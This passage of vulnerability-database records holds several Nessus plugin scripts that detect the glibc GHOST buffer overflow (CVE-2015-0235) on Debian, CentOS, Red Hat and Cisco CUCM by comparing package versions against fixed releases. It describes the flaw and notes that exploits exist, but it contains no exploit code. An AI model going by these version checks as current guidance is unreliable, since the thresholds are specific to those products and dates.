"modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:eglibc-source", "p-cpe:/a:debian:debian_linux:glibc-doc", "p-cpe:/a:debian:debian_linux:libc-bin", "p-cpe:/a:debian:debian_linux:libc-dev-bin", "p-cpe:/a:debian:debian_linux:libc6", "p-cpe:/a:debian:debian_linux:libc6-amd64", "p-cpe:/a:debian:debian_linux:libc6-dbg", "p-cpe:/a:debian:debian_linux:libc6-dev", "p-cpe:/a:debian:debian_linux:libc6-dev-amd64", "p-cpe:/a:debian:debian_linux:libc6-dev-i386", "p-cpe:/a:debian:debian_linux:libc6-i386", "p-cpe:/a:debian:debian_linux:libc6-i686", "p-cpe:/a:debian:debian_linux:libc6-pic", "p-cpe:/a:debian:debian_linux:libc6-prof", "p-cpe:/a:debian:debian_linux:libc6-udeb", "p-cpe:/a:debian:debian_linux:libc6-xen", "p-cpe:/a:debian:debian_linux:libnss-dns-udeb", "p-cpe:/a:debian:debian_linux:libnss-files-udeb", "p-cpe:/a:debian:debian_linux:locales", "p-cpe:/a:debian:debian_linux:locales-all", "p-cpe:/a:debian:debian_linux:nscd", "cpe:/o:debian:debian_linux:6.0"], "id": "DEBIAN_DLA-139.NASL", "href": "https://www.tenable.com/plugins/nessus/82122", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Debian Security Advisory DLA-139-1. The text\n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(82122);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2015-0235\");\n script_bugtraq_id(72325);\n\n script_name(english:\"Debian DLA-139-1 : eglibc security update (GHOST)\");\n script_summary(english:\"Checks dpkg output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A vulnerability has been fixed in eglibc, Debian's version of the GNU\nC library :\n\nCVE-2015-0235\n\nQualys discovered that the gethostbyname and gethostbyname2 functions\nwere subject to a buffer overflow if provided with a crafted IP\naddress argument. This could be used by an attacker to execute\narbitrary code in processes which called the affected functions.\n\nThe original glibc bug was reported by Peter Klotz.\n\nWe recommend that you upgrade your eglibc packages.\n\nThe other three CVEs fixed in Debian wheezy via DSA 3142-1 have\nalready been fixed in squeeze LTS via DLA DLA 97-1.\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.debian.org/debian-lts-announce/2015/01/msg00012.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/squeeze-lts/eglibc\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Upgrade the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Exim GHOST (glibc gethostbyname) Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:eglibc-source\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:glibc-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libc-bin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libc-dev-bin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libc6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libc6-amd64\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libc6-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libc6-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libc6-dev-amd64\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libc6-dev-i386\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libc6-i386\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libc6-i686\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libc6-pic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libc6-prof\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libc6-udeb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libc6-xen\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libnss-dns-udeb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libnss-files-udeb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:locales\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:locales-all\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:nscd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:6.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/01/28\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/03/26\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"6.0\", prefix:\"eglibc-source\", reference:\"2.11.3-4+deb6u4\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"glibc-doc\", reference:\"2.11.3-4+deb6u4\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libc-bin\", reference:\"2.11.3-4+deb6u4\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libc-dev-bin\", reference:\"2.11.3-4+deb6u4\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libc6\", reference:\"2.11.3-4+deb6u4\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libc6-amd64\", reference:\"2.11.3-4+deb6u4\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libc6-dbg\", reference:\"2.11.3-4+deb6u4\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libc6-dev\", reference:\"2.11.3-4+deb6u4\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libc6-dev-amd64\", reference:\"2.11.3-4+deb6u4\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libc6-dev-i386\", reference:\"2.11.3-4+deb6u4\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libc6-i386\", reference:\"2.11.3-4+deb6u4\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libc6-i686\", reference:\"2.11.3-4+deb6u4\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libc6-pic\", reference:\"2.11.3-4+deb6u4\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libc6-prof\", reference:\"2.11.3-4+deb6u4\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libc6-udeb\", reference:\"2.11.3-4+deb6u4\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libc6-xen\", reference:\"2.11.3-4+deb6u4\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libnss-dns-udeb\", reference:\"2.11.3-4+deb6u4\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libnss-files-udeb\", reference:\"2.11.3-4+deb6u4\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"locales\", reference:\"2.11.3-4+deb6u4\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"locales-all\", reference:\"2.11.3-4+deb6u4\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"nscd\", reference:\"2.11.3-4+deb6u4\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-11T14:47:32", "description": "Updated glibc packages that fix one security issue are now available for Red Hat Enterprise Linux 6 and 7.\n\nRed Hat Product Security has rated this update as having Critical security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section.\n\nThe glibc packages provide the standard C libraries (libc), POSIX thread libraries (libpthread), standard math libraries (libm), and the Name Server Caching Daemon (nscd) used by multiple programs on the system. Without these libraries, the Linux system cannot function correctly.\n\nA heap-based buffer overflow was found in glibc's\n__nss_hostname_digits_dots() function, which is used by the gethostbyname() and gethostbyname2() glibc function calls. A remote attacker able to make an application call either of these functions could use this flaw to execute arbitrary code with the permissions of the user running the application. (CVE-2015-0235)\n\nRed Hat would like to thank Qualys for reporting this issue.\n\nAll glibc users are advised to upgrade to these updated packages, which contain a backported patch to correct this issue.", "cvss3": {}, "published": "2015-01-28T00:00:00", "type": "nessus", "title": "CentOS 6 / 7 : glibc (CESA-2015:0092) (GHOST)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-0235"], "modified": "2021-01-04T00:00:00", "cpe": ["p-cpe:/a:centos:centos:glibc", "p-cpe:/a:centos:centos:glibc-common", "p-cpe:/a:centos:centos:glibc-devel", "p-cpe:/a:centos:centos:glibc-headers", "p-cpe:/a:centos:centos:glibc-static", "p-cpe:/a:centos:centos:glibc-utils", "p-cpe:/a:centos:centos:nscd", "cpe:/o:centos:centos:6", "cpe:/o:centos:centos:7"], "id": "CENTOS_RHSA-2015-0092.NASL", "href": "https://www.tenable.com/plugins/nessus/81026", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2015:0092 and \n# CentOS Errata and Security Advisory 2015:0092 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(81026);\n script_version(\"1.22\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2015-0235\");\n script_bugtraq_id(72325);\n script_xref(name:\"CERT\", value:\"967332\");\n script_xref(name:\"RHSA\", value:\"2015:0092\");\n\n script_name(english:\"CentOS 6 / 7 : glibc (CESA-2015:0092) (GHOST)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote CentOS host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated glibc packages that fix one security issue are now available\nfor Red Hat Enterprise Linux 6 and 7.\n\nRed Hat Product Security has rated this update as having Critical\nsecurity impact. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available from the\nCVE link in the References section.\n\nThe glibc packages provide the standard C libraries (libc), POSIX\nthread libraries (libpthread), standard math libraries (libm), and the\nName Server Caching Daemon (nscd) used by multiple programs on the\nsystem. Without these libraries, the Linux system cannot function\ncorrectly.\n\nA heap-based buffer overflow was found in glibc's\n__nss_hostname_digits_dots() function, which is used by the\ngethostbyname() and gethostbyname2() glibc function calls. A remote\nattacker able to make an application call either of these functions\ncould use this flaw to execute arbitrary code with the permissions of\nthe user running the application. (CVE-2015-0235)\n\nRed Hat would like to thank Qualys for reporting this issue.\n\nAll glibc users are advised to upgrade to these updated packages,\nwhich contain a backported patch to correct this issue.\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2015-January/020907.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?6572e379\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2015-January/020908.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?cecc8718\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected glibc packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2015-0235\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Exim GHOST (glibc gethostbyname) Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:glibc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:glibc-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:glibc-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:glibc-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:glibc-static\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:glibc-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:nscd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:7\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/01/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/01/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/01/28\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"CentOS Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/CentOS/release\");\nif (isnull(release) || \"CentOS\" >!< release) audit(AUDIT_OS_NOT, \"CentOS\");\nos_ver = pregmatch(pattern: \"CentOS(?: Linux)? release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"CentOS\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(6|7)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"CentOS 6.x / 7.x\", \"CentOS \" + os_ver);\n\nif (!get_kb_item(\"Host/CentOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"CentOS\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"CentOS-6\", reference:\"glibc-2.12-1.149.el6_6.5\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"glibc-common-2.12-1.149.el6_6.5\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"glibc-devel-2.12-1.149.el6_6.5\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"glibc-headers-2.12-1.149.el6_6.5\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"glibc-static-2.12-1.149.el6_6.5\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"glibc-utils-2.12-1.149.el6_6.5\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"nscd-2.12-1.149.el6_6.5\")) flag++;\n\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"glibc-2.17-55.el7_0.5\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"glibc-common-2.17-55.el7_0.5\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"glibc-devel-2.17-55.el7_0.5\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"glibc-headers-2.17-55.el7_0.5\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"glibc-static-2.17-55.el7_0.5\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"glibc-utils-2.17-55.el7_0.5\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"nscd-2.17-55.el7_0.5\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"glibc / glibc-common / glibc-devel / glibc-headers / glibc-static / etc\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-11T14:49:37", "description": "According to its self-reported version, the remote Cisco Unified Communications Manager (CUCM) device is affected by a heap-based buffer overflow in the GNU C Library (glibc) due to improperly validating user-supplied input in the glibc functions\n__nss_hostname_digits_dots(), gethostbyname(), and gethostbyname2().\nThis allows a remote attacker to cause a buffer overflow, resulting in a denial of service condition or the execution of arbitrary code.", "cvss3": {}, "published": "2015-02-26T00:00:00", "type": "nessus", "title": "Cisco Unified Communications Manager Remote Buffer Overflow (CSCus66650) (GHOST)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-0235"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:cisco:unified_communications_manager"], "id": "CISCO_CUCM_CSCUS66650-GHOST.NASL", "href": "https://www.tenable.com/plugins/nessus/81546", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(81546);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2015-0235\");\n script_bugtraq_id(72325);\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCus66650\");\n script_xref(name:\"CERT\", value:\"967332\");\n\n script_name(english:\"Cisco Unified Communications Manager Remote Buffer Overflow (CSCus66650) (GHOST)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote device is affected by a buffer overflow vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version, the remote Cisco Unified\nCommunications Manager (CUCM) device is affected by a heap-based\nbuffer overflow in the GNU C Library (glibc) due to improperly\nvalidating user-supplied input in the glibc functions\n__nss_hostname_digits_dots(), gethostbyname(), and gethostbyname2().\nThis allows a remote attacker to cause a buffer overflow, resulting in\na denial of service condition or the execution of arbitrary code.\");\n # https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20150128-ghost\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?fd2144f8\");\n # https://www.qualys.com/research/security-advisories/GHOST-CVE-2015-0235.txt\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?c7a6ddbd\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the relevant patch referenced in the Cisco bug advisory.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2015-0235\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Exim GHOST (glibc gethostbyname) Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/01/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/02/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/02/26\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:cisco:unified_communications_manager\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CISCO\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"cisco_ucm_detect.nbin\");\n script_require_keys(\"Host/Cisco/CUCM/Version\", \"Host/Cisco/CUCM/Version_Display\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nver = get_kb_item_or_exit(\"Host/Cisco/CUCM/Version\");\nver_display = get_kb_item_or_exit(\"Host/Cisco/CUCM/Version_Display\");\napp_name = \"Cisco Unified Communications Manager (CUCM)\";\n\nfixed_ver = FALSE;\n\n# Advisory says 7.1.5 - 10.5.2\nif(ver =~ \"^7\\.\" &&\n ver_compare(ver:ver, fix:\"7.1.5\", strict:FALSE) >= 0 &&\n ver_compare(ver:ver, fix:\"8.0.0\", strict:FALSE) < 0\n )\n fixed_ver = \"8.6.1.20013.3\";\nelse if(ver =~ \"^8\\.\" && ver_compare(ver:ver, fix:\"8.6.1.20013.3\", strict:FALSE) < 0)\n fixed_ver = \"8.6.1.20013.3\";\nelse if(ver =~ \"^8\\.6\\.2\\.\" && ver_compare(ver:ver, fix:\"8.6.2.26158.1\", strict:FALSE) < 0)\n fixed_ver = \"8.6.2.26158.1\";\nelse if(ver =~ \"^10\\.0\\.\" && ver_compare(ver:ver, fix:\"10.0.1.13015.1\", strict:FALSE) < 0)\n fixed_ver = \"10.0.1.13015.1\";\nelse if(ver =~ \"^10\\.5\\.\" && ver_compare(ver:ver, fix:\"10.5.2.11008.1\", strict:FALSE) < 0)\n fixed_ver = \"10.5.2.11008.1\";\nelse if(ver =~ \"^11\\.0\\.\" && ver_compare(ver:ver, fix:\"11.0.0.98000.89\", strict:FALSE) < 0)\n fixed_ver = \"11.0.0.98000.89\";\nelse if(ver =~ \"^9\\.1\\.\" && ver_compare(ver:ver, fix:\"9.1.2.13078.1\", strict:FALSE) < 0)\n fixed_ver = \"9.1.2.13078.1\";\nelse\n audit(AUDIT_INST_VER_NOT_VULN, app_name, ver_display);\n\n\nif (report_verbosity > 0)\n{\n report =\n '\\n Cisco bug ID : CSCus66650' +\n '\\n Installed release : ' + ver_display +\n '\\n Fixed release : ' + fixed_ver +\n '\\n';\n security_hole(port:0, extra:report);\n}\nelse security_hole(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-11T14:47:56", "description": "Updated glibc packages that fix one security issue are now available for Red Hat Enterprise Linux 5.6 Long Life, Red Hat Enterprise Linux 5.9 Extended Update Support, Red Hat Enterprise Linux 6.2 Advanced Update Support, and Red Hat Enterprise Linux 6.4 and 6.5 Extended Update Support.\n\nRed Hat Product Security has rated this update as having Critical security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section.\n\nThe glibc packages provide the standard C libraries (libc), POSIX thread libraries (libpthread), standard math libraries (libm), and the Name Server Caching Daemon (nscd) used by multiple programs on the system. Without these libraries, the Linux system cannot function correctly.\n\nA heap-based buffer overflow was found in glibc's\n__nss_hostname_digits_dots() function, which is used by the gethostbyname() and gethostbyname2() glibc function calls. A remote attacker able to make an application call either of these functions could use this flaw to execute arbitrary code with the permissions of the user running the application. (CVE-2015-0235)\n\nRed Hat would like to thank Qualys for reporting this issue.\n\nAll glibc users are advised to upgrade to these updated packages, which contain a backported patch to correct this issue.", "cvss3": {}, "published": "2015-01-29T00:00:00", "type": "nessus", "title": "RHEL 5 / 6 : glibc (RHSA-2015:0099) (GHOST)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-0235"], "modified": "2019-10-24T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:glibc", "p-cpe:/a:redhat:enterprise_linux:glibc-common", "p-cpe:/a:redhat:enterprise_linux:glibc-debuginfo", "p-cpe:/a:redhat:enterprise_linux:glibc-debuginfo-common", "p-cpe:/a:redhat:enterprise_linux:glibc-devel", "p-cpe:/a:redhat:enterprise_linux:glibc-headers", "p-cpe:/a:redhat:enterprise_linux:glibc-static", "p-cpe:/a:redhat:enterprise_linux:glibc-utils", "p-cpe:/a:redhat:enterprise_linux:nscd", "cpe:/o:redhat:enterprise_linux:5.6", "cpe:/o:redhat:enterprise_linux:5.9", "cpe:/o:redhat:enterprise_linux:6", "cpe:/o:redhat:enterprise_linux:6.2", "cpe:/o:redhat:enterprise_linux:6.4", "cpe:/o:redhat:enterprise_linux:6.5"], "id": "REDHAT-RHSA-2015-0099.NASL", "href": "https://www.tenable.com/plugins/nessus/81068", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2015:0099. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(81068);\n script_version(\"1.22\");\n script_cvs_date(\"Date: 2019/10/24 15:35:39\");\n\n script_cve_id(\"CVE-2015-0235\");\n script_xref(name:\"RHSA\", value:\"2015:0099\");\n\n script_name(english:\"RHEL 5 / 6 : glibc (RHSA-2015:0099) (GHOST)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated glibc packages that fix one security issue are now available\nfor Red Hat Enterprise Linux 5.6 Long Life, Red 